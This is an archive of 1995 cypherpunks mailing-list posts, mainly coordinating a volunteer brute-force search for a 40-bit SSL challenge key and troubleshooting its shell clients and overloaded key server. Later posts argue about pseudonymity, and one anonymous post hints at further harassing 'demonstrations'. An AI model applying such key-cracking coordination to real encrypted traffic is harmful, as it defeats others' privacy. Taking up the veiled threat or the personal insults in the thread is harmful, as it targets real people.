think that if we selected 8AM west coast time (1600 GMT?) more people 
would come online more quickly.

4. There was a massive crush of people trying to get keys from the server 
at 2. If we ever do this again, we might think about preallocating chunks 
of keyspace to people according to their promised cpu power, and keeping
the *challenge* a secret till the starting gun sounds. Passively serving a 
page with the challenge would load the server much less than the cgi-based
key doler.

5. We needed more pre-publicity on the Net to attract participants - a 
week would have been better than 24 hours. 

just some random thoughts....


Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Thu, 24 Aug 95 10:28:40 PDT
To: Jyri Kaljundi <jk@digit.ee>
Subject: Re: brloop not working
In-Reply-To: <Pine.3.89.9508241932.A6525-0100000@digit.ee>
Message-ID: <"swan.cl.cam.:150900:950824172806"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


> I just dont seem to get brloop working.

The server is being HAMMERED again ....

There appears to be a failure mode whereby when busy, clients call up,
say "HELO", then "QUIT" :-((

This adds to the hammering :-((

> It says:
> Command failed -- brutessl missing ?
> what seems to be wrong is that it tries to execute command:
> brutessl -

The code expects brclient to return one line which is the comamnd line flags
for brutessl, followed by the config data.

As brclient is failing, brutessl is being called without the expected args :-(

> although brutessl does not have a command line option '-'. Why is the '-'
> there after brutessl ?

The first arg of brutessl is the file from which to read the config info.
"-" is a unix convention for the file "stdin".

SO: go grab brclient 0.12 which has a more efficient "-L" flag.
    go read http://www.brute.cl.cam.ac.uk/brute/how2run.html
	in particular, create .brloop.rc containing

		tailored=true
		checkcmds=false
		BRNAME="Jyri Kaljundi"
		BRID="jk@digit.ee"

	which will stop it checking the commands, set the ID, etc ...
	[[ NB: Other users should change BRNAME and BRID !! ]]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lethin@ai.mit.edu (Rich Lethin)
Date: Thu, 24 Aug 95 15:40:51 PDT
To: cypherpunks@toad.com
Subject: Server Bottleneck
Message-ID: <9508242240.AA26478@grape-nuts>
MIME-Version: 1.0
Content-Type: text/plain



The bottleneck at the server is pretty awful.  My clients are spending
most of their time in timeout, waiting for keyspace. 

Also, users on the workstations have complained that the programs eat
of lots of system time, despite their being nice'd to +19...

---
Concurrent VLSI Arch. Group     545 Technology Sq., Rm. 610
MIT AI Lab                      Cambridge, MA 02139 (617)-253-0972




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Thu, 24 Aug 95 15:53:09 PDT
To: Tom Gillman <syshtg@gsusgi2.Gsu.EDU>
Subject: Linux fix was Re: brloop not working
In-Reply-To: <199508242146.RAA21529@gsusgi2.Gsu.EDU>
Message-ID: <Pine.SUN.3.91.950824183000.22646I-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 24 Aug 1995, Tom Gillman wrote:

> Use 'nice -20 brutessl -- -' instead. The '--' tells getopts() not to parse
> anything else as arguments, then the next '-' will be interpreted correctly.

I made the change, and while it still chokes when you call brutessl 
without keys (a feature, right?), it DOES work when you get a valid keyspace.

So Linux people might want to change the command in brloop if you are 
getting the same problems I was:

#:10: the actual command to do the work ....
cmd="${cmd-$brclient -dklLt$type|(read a;nice -20 $brute$type -- - \$a)|(read a;

[Huh, like, I wrote more code ;]

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: White Adept <adept@minerva.cis.yale.edu>
Date: Thu, 24 Aug 95 16:15:55 PDT
To: "Donald M. Kitchen" <don@cs.byu.edu>
Subject: Re: server congestion
In-Reply-To: <199508242251.QAA23003@bert.cs.byu.edu>
Message-ID: <Pine.SOL.3.91.950824191510.1011B-100000@minerva>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 24 Aug 1995, Donald M. Kitchen wrote:

> You know, this is really fun. Too bad the prize isn't something really cool,
> like a free wastebasket in case Windoze 95 comes my way...

Well, if you win, then we'll chip in and get you a recycling bin.

Ben.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ghio@cmu.edu (Matthew Ghio)
Date: Thu, 24 Aug 95 17:01:59 PDT
To: cypherpunks@toad.com
Subject: Linux brutessl client
Message-ID: <m0slm0V-000wQYC@myriad>
MIME-Version: 1.0
Content-Type: text/plain


I get 11100 keys/sec with Linux/gcc 2.5.8 on a 486/66, optimized with
-O2 and -fomit-frame-pointer.

-fforce-mem and -funroll-loops made the program run more slowly.

I also tried -ffast-math -finline-functions -fforce-addr -fcaller-saves
which seemed to make no difference.


Now maybe when they get the server working again I can actually try
running this. :(




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jyri Kaljundi <jk@digit.ee>
Date: Thu, 24 Aug 95 09:54:41 PDT
To: cypherpunks@toad.com
Subject: brloop not working
Message-ID: <Pine.3.89.9508241932.A6525-0100000@digit.ee>
MIME-Version: 1.0
Content-Type: text/plain



I just dont seem to get brloop working. It says:

Command failed -- brutessl missing ?

what seems to be wrong is that it tries to execute command:

brutessl -

although brutessl does not have a command line option '-'. Why is the '-' 
there after brutessl ?

<o       Jri Kaljundi          e-mail: jk@digit.ee         o<
 >o                             tel: +372 6308994            o>
<o       DigiTurg               http://www.digit.ee/        o<





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Thu, 24 Aug 95 17:15:36 PDT
To: cypherpunks@toad.com
Subject: SSL Challenge: Server problems
Message-ID: <9508250015.AA22053@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


I can't contact the server to request keyspace anymore - I get a 
'500 Server error'

It looks like 12 hours on a P5/90 are going to waste (could have done
90 segments)


Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Thu, 24 Aug 95 12:58:49 PDT
To: blane@com.eskimo
Subject: Re: Brute SSL Challenge
In-Reply-To: <Pine.SUN.3.91.950824122951.12822D-100000@eskimo.com>
Message-ID: <13157.9508241956@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



>  In the same vein, a 32 bit OS2 version would be nice.

There a 32 bit OS2 app which TJ Hardin compiled, it's on the ftp and
web site.  It was compiled with the OS2 version of gcc.

>   I'm not sure how brutessl works exactly, but if it could connect to the 
> server, get its key assignments, and then chug away while disconnected 
> from the net I could see what kind of speed I get out of my 40MHz 486.

A the moment, there is no C code version of the client, it's perl
only, and I suspect would not work under OS/2 even with the perl for
OS2 even without a fair bit of work.

You could, however, use the WWW key doler, there's a place where you
can request keyspace.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Thu, 24 Aug 95 13:41:18 PDT
To: jered@MIT.EDU
Subject: Re: SSL CHALLENGE: 0.11 borken?
In-Reply-To: <199508242005.QAA03863@narn.atype.com>
Message-ID: <"swan.cl.cam.:219400:950824204042"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


>    I had several machines running brloop 0.03 and brclient 0.11, and
> none of them appeared to be sending ACKs back to the server.

The probability of getting an ACK back is indeed small :-((

> Is this a known problem?

yes -- this is why all the WWW pages and my messages to cypherpunks say
"please get the latest code" ...

> It might account for the large number of unACKed keyspaces.

I fear so :-((

> brloop 0.04 and brclient 0.12 seem to work well, however.

Whew !

brclient 0.13 is now out to try to track down the problem which is causing the
comgestion ...

It seems that old brloop's keep calling the server, and sending HELO, COMM and
then QUIT (Greet, Introduce, Part) i.e. not actually do anything :-(
[ Some only manage "HELO" or "HELO COMM" ]

These systems are hammering the server, and I suspect are the cause of the
congestion. I have added more logging to brclient 0.13, and it has caused the
problem to disappear ...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Thu, 24 Aug 95 14:06:52 PDT
To: jered@mit.edu
Subject: BruteSSL: WTF? 0c2b-cf7a NOACK 0c2b 50000 Joe Thomas <jthomas@ogi.com>
Message-ID: <13509.9508242106@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



> It appears that Joe Thomas <jthomas@ogi.com> has more or less locked
> (until things start getting reassigned) most of the keyspace.  Even
> if he had a MasPar, it would still take him more than 2 days to
> check this space.  

Presumably it's just an error, never attribute to malice what can be
explained by simple error (as the saying goes).

> Does anyone know what the deal with this is?  A simple error?  A
> malicious attack? (I think that the SKSP is far to insecure to be
> effective....I could falsely ACK parts of the keyspace if I wanted
> to be mean.)

You could falsely ACK keyspace, but it's designed so that it would be
hard to do this by accident, one of the nos is a checksum, which is
trivial to calculate (for a malicious user who cared to read the
source), but 1/65536 of getting it right by accident.

It'll sort itself out tho', because the way Piete Brooks has written
it, when keyspace reaches FFFF, it starts re-assigning the ones which
aren't acked yet, so the 50000 keys will start getting assigned again.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Thu, 24 Aug 95 05:36:30 PDT
To: cypherpunks@toad.com
Subject: Crypto DLL's/SSLeay 0.4.5
Message-ID: <Pine.SOL.3.91.950824215822.9077D-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain



Just in case people are interested, I've put the most recent version of 
my SSL (SSLeay) library up on ftp://ftp.psy.uq.oz.au/pub/Crypto/SSL/

The big differece with this realease is that it builds under Windows 3.1.
The DLL's for the libraries are there as well as the ported demo programs.
I've used Borland C 4.0 and the .IDE file plus source code are in the 
distribution.

The DLL's contain routines for MD2, MD5, RC4, DES (every mode you could 
want :-), IDEA, RSA, SSL and all the X509 etc stuff that is part of life 
with SSL.  The library even compiled under MSDOS :-).

Since my code base will always be unix first, the code is not optimised 
for 16bit and probably never will be, but still, the algorithms work and 
the code is free for comercial and non-comercial use.  The applications 
need work to make them nice under Windows, but hell, I'm only writing a 
library :-).

On the PGPphone issue, I Personally I feel SSLphone would be a much 
better way of doing things.  If some-one has a 'voice' over modem program 
already, they should be able to slip SSL into it in only a few days.
For phone over modem, authentication is not really required and what 
exists in my library is everything required for the encryption side of 
things.

those URL's again
http://www.psy.uq.oz.au/~ftp/Crypto/
ftp://ftp.psy.uq.oz.au/pub/Crypto/SSL
ftp://ftp.psy.uq.oz.au/pub/Crypto/SSLapps

eric 
--
Eric Young                  | Signature removed since it was generating
AARNet: eay@mincom.oz.au    | more followups that the message contents :-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Thu, 24 Aug 95 14:14:54 PDT
To: trei@process.com ("Peter Trei")
Subject: Re: SSL CHALLENGE: ALERT! probable misallocation of keys?
Message-ID: <13538.9508242114@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Peter Trei <trei@process.com> writes on cpunks:
> My suspicion - and let me apologize in advance if I'm wrong - is
> that Mr. Thomas thinks he's allocated himself 50,000 keys, whereas
> he's actually got 838,860,800,000.

A quite plausible theory, hadn't thought of that.

> You've reserved 3/4 of the keyspace, and you're going to screw up the 
> search unless you have an NSA-sized data center.
> 
> I suggest we assume this is an error, and remove the block from the
> reserved list so that it can be re-allocated.

Piete's server is more reslient than that!

What happens is that when it reaches FFFF, it'll start doling out yet
unacked keys on the assumption that they were mistakes, or that they
were slow machines, or WWW doled ones which the user forgot to ack.

This is better for speed reasons also, as it means everybody gets
something to do right up to the end, there'll be a mad scrabble at the
end where multiple people are working on the same keyspace, as it
wraps around the remaining unacked bits of key, but the 1st person to
ack gets credited for it, and that way it gets done as quickly as
possible.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Thu, 24 Aug 95 14:37:03 PDT
To: Thomas Grant Edwards <tedwards@src.umd.edu>
Subject: Re: brloop not working
In-Reply-To: <Pine.SUN.3.91.950824172125.22646D-100000@thrash.src.umd.edu>
Message-ID: <"swan.cl.cam.:239560:950824213618"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


> Ah, found the problem.  where is that "-" coming from??? [Linux]

brloop in the shell variable "cmd".

#:10: the actual command to do the work ....
cmd="${cmd-$brclient -dklLt$type|(read a;nice -20 $brute$type - \$a)|(read a;
echo '     '\$a 1>&2; echo \$a) |$brclient -AlLt$type}"

> ++ nice -20 brutessl - 2977 d42f 1
> usage: brutessl [-q] <filename> <checksum> <start segment> <no of segments>
>        brutessl [-q] -r <filename> [<no of segments>]
>        brutessl [-q] -t [<hours>[:<minutes>]]
> 
> I've stopped it until I can get that fixed.  brclient is way huge now...I 
> can't see how to get rid of the "-".

"-" is the name of the <filename> -- it's a unix convention for "stdin".
brutessl 1.0 was incompatible with bruterc4 -- that was the reason for
releasing brutessl 1.01

If you are stuck with brutessl 1.0, fix cmd to be

#:10: the actual command to do the work ....
cmd="${cmd-$brclient -dklLt$type|(read a;nice -20 $brute$type -- - \$a)|(read a;
echo '     '\$a 1>&2; echo \$a) |$brclient -AlLt$type}"

i.e. prefix the "-" with "-- "




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Thu, 24 Aug 95 14:45:00 PDT
To: Thomas Grant Edwards <tedwards@src.umd.edu>
Subject: Re: brloop not working
In-Reply-To: <Pine.SUN.3.91.950824172624.22646F-100000@thrash.src.umd.edu>
Message-ID: <"swan.cl.cam.:242090:950824214413"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


> OK - I dig this, but brutessl on my Linux box is still complaining about 
> usage...(sorry about the bandwidth but I assume other people are probably 
> having similar problems)

OK -- I'll leave CP on the CC list then ...

+ eval brclient -dklLtssl|(read a;nice -20 brutessl - $a)|(read a;echo  
$a 1>&2;
 echo $a) |brclient -AlLtssl
++ brclient -dklLtssl
++ brclient -AlLtssl
++ read a
++ read a
++ nice -20 brutessl -

That's the problem -- "brclient -dklLtssl" failed to return any keys,
[ congestion of the server :-((( ]
so brutessl was called with just the "-" which brloop put there.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Thu, 24 Aug 95 14:52:49 PDT
To: Christian Wettergren <cwe@Csli.Stanford.EDU>
Subject: Re: SSL CHALLENGE: ALERT! probable misallocation of keys?
In-Reply-To: <199508242116.OAA23923@Csli.Stanford.EDU>
Message-ID: <"swan.cl.cam.:244760:950824215153"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


> Where can one observe the progress of the computations? What is 
> allocated etc?

See "inspect the current status of the search" on
http://www.brute.cl.cam.ac.uk/brute/

Note that I have disabled auto-generation of the stats file to help
reduce the congestion ...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Tang <altitude@cic.net>
Date: Thu, 24 Aug 95 19:54:00 PDT
To: Piete.Brooks@cl.cam.ac.uk (Piete Brooks)
Subject: Re: server congestion?
In-Reply-To: <"swan.cl.cam.:271770:950824230145"@cl.cam.ac.uk>
Message-ID: <199508250253.WAA24682@petrified.cic.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu Aug 24 19:00:15 1995: you scribbled...
> 
> > Couldn't one take advantage of the 50.000 mistake, by
> > setting up a second server for that space.
> 
> The design of the prtotocol assumes a hierarchy -- maybe in the next attempt.
> 
> Static partitioning would be possible (e.g. 0000-7ffff and 8000-ffff)
> but there are problems with acking to the right server, deciding which to
> contact, etc.

It would probably be best to have the "child" servers requeset large
chunnks of keyspace from a "parent" server.  This may require some minimal
extension to the protocol.  In particular, in the helo, you may want to
add a "client type" field which would be either "Client" or "Server".  If
it's a "Server" the parent server would keep track of the name/ip of the
"child" server.  If someone tried to ack a set of keyspace that the "child"
server was responsible for, the "parent" server would return either a 

	601 STOP <child server/port>

or perhaps a new return code  such as

	602 ACKHERE <child server/port>

The 602 code would differ from the 601 code stop in that the client could
come back to either server in the future.

This would let a real "Client" could request keys from any server, but 
would have to ack back to the same server.

When the "child" server runs out of keyspace, it would get some more from
it's "parent" server.  

Just my $0.02.

...alex...



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Thu, 24 Aug 95 15:11:49 PDT
To: Jyri Kaljundi <jk@digit.ee>
Subject: Re: SSL CHALLENGE: ALERT! probable misallocation of keys?
In-Reply-To: <Pine.3.89.9508250018.A1207-0100000@digit.ee>
Message-ID: <"swan.cl.cam.:251950:950824220946"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


> Just a dumb question: when brutessl-brclient-brloop will find the key,
> will it report it to the keyserver right away?

IF it manages to get a word in edgeways, yes.

However, I fear some ACKS are being lost :-(

> What I mean is can I just start the brloops on my machines and log out,
> and not have to look at the display all the time?

Indeed -- it's meant to run unattended.

HOWEVER, due to the problems with loosing ACKs, it would be useful to send
the output to a log file, and then check that all the scanned segments made it
to the server [[ NB: stats updates are currently manual !! ]]

> BTW how can I log brloop's output into a file and not to the screen?

sh:	brloop >> logfile 2>&1 &
csh	brloop >>& logfile &		(I think)

Aliter:	"nohup brloop &" might do it




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blane@eskimo.com (Brian Lane)
Date: Thu, 24 Aug 95 23:13:05 PDT
To: cypherpunks@toad.com
Subject: OS/2 Brute SSL binary
Message-ID: <199508250612.XAA12117@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain



  After an evening of installing emx+gcc for OS/2 I have gotten a compiled binary to run on my machine. Its chugging away at 5100 keys/sec.

  If you want to try out my binaries, ftp over to:

  ftp.eskimo.com/~blane/brutessl/bruteos2.zip

  I have included the .exe, the .txt file and the .pf files for hals 2 challenges and the test.pf

  I think I have it compiled so that you don't need emx.dll on your system, but I can't test it(I have emx installed). Let me know of any problems.

  I tried the os/2 binaries from the ftp.brute... site, but they insisted on running the DOS command.com shell, and then dying with an error.

  Good luck!

    Brian

--------------------------------------------------------------------------------------
http://www.eskimo.com/~blane     |  Finger for PGP Key  |  'Space, its so roomy!'  - B. Bunny
ftp://ftp.eskimo.com/~blane         |                        |
--------------------------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 24 Aug 95 23:22:45 PDT
To: cypherpunks@toad.com
Subject: Re: The Theory of Nymity (value of True Names)
Message-ID: <199508250622.XAA00966@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


Larry Detweiler wrote:

> part of L.D.'s demonstrations were the harm that someone with
> some ingenuity, flair, malice, and boredom could wreak on any 
> cyberspatial community through the use of unrestrained 
> anonymity/pseudonymity. and it appears that some of you still
> don't get the point. perhaps another reminder or demonstration
> is in order 

Larry has from time to time attempted to prove that net 
anarchy is a bad thing, because people can engage in 
nasty pointless destructive behavior.  In addition to his 
battles with the cypherpunks list over anonymity, he has 
also argued with pretty much the entire net community 
that without a central authority it is meaningless to 
attempt to distinguish between good conduct and bad 
conduct, and has attempted to prove his thesis by actual 
demonstration.

His accounts have been repeatedly yanked, he has found 
himself under endless savage attack by a large part of 
the entire internet, and has repeatedly gone completely 
insane, possible because of the emotional stress 
resulting from massive hostility, denigration, and 
contempt from huge numbers of people.

Of late his attacks have become more cautious and less 
likely to provoke massive retaliation. He appears to have 
recovered his sanity temporarily.

Perhaps another reminder or demonstration is in order.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Thu, 24 Aug 95 15:43:31 PDT
To: Sam Quigley <poodge@econ.Berkeley.EDU>
Subject: Re: SSL CHALLENGE: ALERT! probable misallocation of keys?
In-Reply-To: <199508242151.OAA13622@quesnay.Berkeley.EDU>
Message-ID: <"swan.cl.cam.:260400:950824223105"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


> How often is this updated?

whenever I type "make" -- I have disabled auto-updating while the server is
over congested ...

> So far, the only thing it shows I've acked is the keyspace I
> manually ACKed over the WWW interface (actually, I ACKed it a bunch of
> times -- the forms weren't producing responses, so I resent them a
> couple times..)

I fear that some ACKs may be lost :-((

1) use brloop 0.04 and brclient 0.13 might help
2) send stdout and stderr to a log file and scan it :-(




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Thu, 24 Aug 95 16:03:43 PDT
To: Christian Wettergren <cwe@Csli.Stanford.EDU>
Subject: Re: server congestion?
In-Reply-To: <199508242214.PAA25424@Csli.Stanford.EDU>
Message-ID: <"swan.cl.cam.:271770:950824230145"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


> Couldn't one take advantage of the 50.000 mistake, by
> setting up a second server for that space.

The design of the prtotocol assumes a hierarchy -- maybe in the next attempt.

Static partitioning would be possible (e.g. 0000-7ffff and 8000-ffff)
but there are problems with acking to the right server, deciding which to
contact, etc.

> I guess things will screw up when the first server reaches 
> FFFF, as indicated earlier.

Yup.

> What would be nice is if one could divide up the key
> between servers also.

Hierarchy or static ?

> Another thing that might decrease the load on the server
> is if we start allocating more blocks at a time, lets
> say 2-4 blocks each time. Wouldn't that help?

I think most of the load is "HELO COMM QUIT" clients.
Yes -- we had thought of upping the allocation ....




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sam Quigley <poodge@econ.Berkeley.EDU>
Date: Fri, 25 Aug 95 00:07:59 PDT
To: cypherpunks@toad.com
Subject: random coincidences
Message-ID: <199508250707.AAA14271@quesnay.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


What are some of the more common "coincidences" and non-random
correlations that ordinary random number generators (ones found in
common computer languages that don't take extensive measures to be
random) have?

It seems that there's a lot of fuss about getting very random numbers,
but unless the numbers produced by ordinary measures have very obvious
coincidences, maybe it's a big fuss about nothing...?

- -sq

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBMD12u1IP+Y8TPTdtAQECmwP/UTLcmOL1sKvOrtO7XcE5mNpr5gjou/Ht
kWqIbobOroIsW3YtbL/KbdFmxBhPr9SrynYc76vlqRXG0vai5xOmqRdMyCXs+67U
qWWRxlJRhEgbdGNaH2YgSU7MlEIGq64oEWW439wbABG+TMQtV225gzhOUsCEM9qg
3Bun1zOnJIc=
=xhWT
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jyri Kaljundi <jk@digit.ee>
Date: Thu, 24 Aug 95 14:43:54 PDT
To: cypherpunks@toad.com
Subject: Re: SSL CHALLENGE: ALERT! probable misallocation of keys?
In-Reply-To: <13538.9508242114@exe.dcs.exeter.ac.uk>
Message-ID: <Pine.3.89.9508250018.A1207-0100000@digit.ee>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 24 Aug 1995 aba@atlas.ex.ac.uk wrote:

> What happens is that when it reaches FFFF, it'll start doling out yet
> unacked keys on the assumption that they were mistakes, or that they
> were slow machines, or WWW doled ones which the user forgot to ack.

Just a dumb question: when brutessl-brclient-brloop will find the key, 
will it report it to the keyserver right away? What I mean is can I just 
start the brloops on my machines and log out, and not have to look at the 
display all the time?

BTW how can I log brloop's output into a file and not to the screen?

Juri

<o       Jri Kaljundi          e-mail: jk@digit.ee         o<
 >o                             tel: +372 6308994            o>
<o       DigiTurg               http://www.digit.ee/        o<





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Thu, 24 Aug 95 18:02:38 PDT
To: trei@process.com
Subject: Re: SSL Challenge: Server problems
In-Reply-To: <9508250015.AA22053@toad.com>
Message-ID: <"swan.cl.cam.:020170:950825010219"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


> I can't contact the server to request keyspace anymore - I get a 
> '500 Server error'

I take that to mean "the WWW server" ...

Well, it appears that the congestion has overcome it too !
Seems that cypherpunks hammer it even harder than its usual hight traffic on
http://www.cl.cam.ac.uk/coffee/coffee.html
I think it's just been running out of process, etc ...
It's working OK for me now ...

> It looks like 12 hours on a P5/90 are going to waste (could have done
> 90 segments)

Try again ....


BTW: I tracked down the (well, at least one) cause of the "HELO COMM QUIT"
     sessions ... brclient 0.14 and brloop 0.5 should fix it. 
     If brloop is running, leave it ASIS (if it passes the "L" flag to
     brclient that is), but replace the brclient script. When the running
     brutessl finishes, the next one will use the new brclient.

     Could everyone who's around make this update to reduce the congestion ?
     Ta.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an366601@anon.penet.fi
Date: Thu, 24 Aug 95 20:00:56 PDT
To: cypherpunks@toad.com
Subject: The Theory of Nymity (value of True Names)
Message-ID: <9508250244.AA26841@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



the thread has been going around about the value of "true names".
this is a complex study of the value of "true names". it dissects
the issue and gets to the core of the matter. it suggests there
is a valuable *psychological* benefit to the use of true names
and that it may even be necessary for "honest communication"
in any "society".

those of you that argue that true names are irrelevant, why is
it that you are the same ones that try to "out" L.D. behind
whatever tentacle-of-the-moment he is hiding behind? do you 
really care, or don't you? actions speak louder than words!!

part of L.D.'s demonstrations were the harm that someone with
some ingenuity, flair, malice, and boredom could wreak on any 
cyberspatial community through the use of unrestrained 
anonymity/pseudonymity. and it appears that some of you still
don't get the point. perhaps another reminder or demonstration
is in order <g>



|   /\  |\| /~ L~            ``I have to spew this stuff, or I'd be on the
L_ /~~\ | | \_ L_             roof with a high power weapon.'' -Jim Carrey
http://www.csn.net/~ldetweil


===

The Theory of Nymity

Detweiler was the first to pioneer the "theory of nymity".  Observing
that various forms of anonymity and pseudonymity were blurred in the
popular consciousness and that the subject was awash with irrational
emotionalism and ill-defined terms, he sought to formalize and
crystalize the fundamental concepts and distinctions involved.

The cypherpunks definitely pioneered forms of nymity, and passionately
champion the general issue, particulary its ramifications in
cyberspace; however they refuse to confront the issue openly and
overtly, suggesting they perceive some sort of stigma or taboo
associated with their practices. They also refuse to contemplate
negative or potentially disastrous social effects of the associated
scenarios, asserting all forms of nymity are either indistinguishable
or essentially morally neutral practices that invariably extend the
rights of the individual in the face of the oppressive State or
massive corporations. They see all forms of nymity as merely one
unified hacksaw of the serf, useful and effective in cutting away
chains of bondage in the Sisyphean struggle for privacy.

Detweiler confronted the diverse implications of nymity by elevating
the subject of "nymity" to a study complete in itself. Abstracting
from his writings, Detweiler considered the concept of a "nym 
spectrum" involving the key concepts of receiver of a message,
sender, and identity. At various points on the nym spectrum, the
receiver has varying degrees of knowledge about the identity of the
sender.

In a Detweilerian model of nymity, an abstract communications space
exists in which messages and their identification can be dissociated
from their senders while still being directed at receivers. A set of
"formal senders" is juxtaposed or overlaid on top of the "actual
senders" analogous to the way formal and actual parameters in
structured computer programs are defined and related.

A "formal sender" is the labeled origination of a message sent by an
"actual sender", who may or may not be identified. The "formal
sender" may be identified in some way that is independent from the
"actual sender" identification. If an actual sender A is identified
as sender B in the message, B is the "formal identification" for the
sender whose "actual identity" is A.

Detweiler defined the various forms of nymity based on the knowledge
of the sender, say party C. This is his critical distinction that
cypherpunks denied, arguing that all the forms of nymity he saw a
difference between were really interchangeable and indistinguishable,
and therefore identical. They do not recognize any relevance of the
"knowledge" or mental state of the receiver in  regards to messages.
(In a sense the  philosophy is similar to behaviorism in asserting
the invalidity of internal mental state.)

A "true name" is defined as a situation where the message is
identified from the actual sender, e.g. message sender is identified
as "A" who actually sent it.

An "anonymous" message is a message with no identification whatsoever.
Detweiler sometimes called this "hit and run anonymity". There is no
attribution in the message to any sender, either formal or actual.
Entity "C" knows the message could be from anyone.

A "pseudonym" is defined as a situation where the message has an
identification, but the receiver is correctly aware that the
identification on the message is not the actual identification. I.e.
C receives a message labelled as originating from "B", but C knows
that "B" is a nym for some other party that *could be* (but not
*necessarily*) actually  identified as "A".

Detweiler defined "pseudoanonymity" as the blurred situation between
the anonymous and the pseudonymous message. The receiver C sees a
message as originating from "B", but C is not aware that "B" is a
formal nym that may actually identify some other party such as A.
Entity A is said to be "pseudospoofing" entity C.

The cypherpunks argue that there is in principle no difference between
Detweiler's "pseudoanonymity" and the classic "pseudonymity", stating
that anywhere there is an "actual" nym, a receiver cannot be sure it
is not really a formal one, and vice versa (i.e., any nym is
potentially a pseudonym or true name). In fact they say there is
fundamentally no distinction to be made between formal and actual
nyms.

The critical question is of course is how "actual" and "formal" nyms
are defined. What does it mean to "identify" a sender with a nym?
Detweiler adapted to the ambiguities in the following way. He defined
the "actual nym" (or, interchangeably, the "true name") as an
identification for party A if for every context where an actual nym
applies, that party is identified as A. Call this the "actual nym
scenario".  The definition appears to be somewhat circular but he was
able to derive conclusions from the premise.

Suppose that a context was established in which the "actual nym"
scenario applied, and a message was identified as from "A". Then "A"
is the actual nym of the sender. Suppose that the context is not
"actual" (the converse will be considered the "formal") and the
message is identified as from B. If there is some  "additional
information" that B is a "true name",  then B is the actual sender,
and no other party sent the message (forms of the "additional
information clause will be considered below). Otherwise no conclusion
can be made about the actual sender.

In general, in an "actual context" the actual sender is always the
formal sender. In a formal context, the actual sender is dissociated
from the formal identity of the message,  but "independent
